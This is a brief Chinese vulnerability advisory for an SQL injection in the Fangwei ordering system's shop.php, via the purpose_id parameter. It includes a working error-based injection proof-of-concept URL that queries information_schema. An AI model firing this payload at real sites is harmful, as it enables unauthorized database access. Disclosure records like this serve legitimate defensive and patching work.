方维订餐系统shop.php sql注入漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### sql报错注入 漏洞位置: ``` /shop.php?ctl=index&act=ajax_purpose_store&purpose_id=1 ``` 参数purpose_id 存在sql注入 ``` poc:/shop.php?ctl=index&act=ajax_purpose_store&purpose_id=1%20and%20(select/**/%201%20from/**/%20(select/**/%20count(*),concat(md5(1),floor(rand(0)*2))x%20from/**/%20information_schema.tables%20group%20by%20x)a) ```

0%
暂无可用Exp或PoC
当前有0条受影响产品信息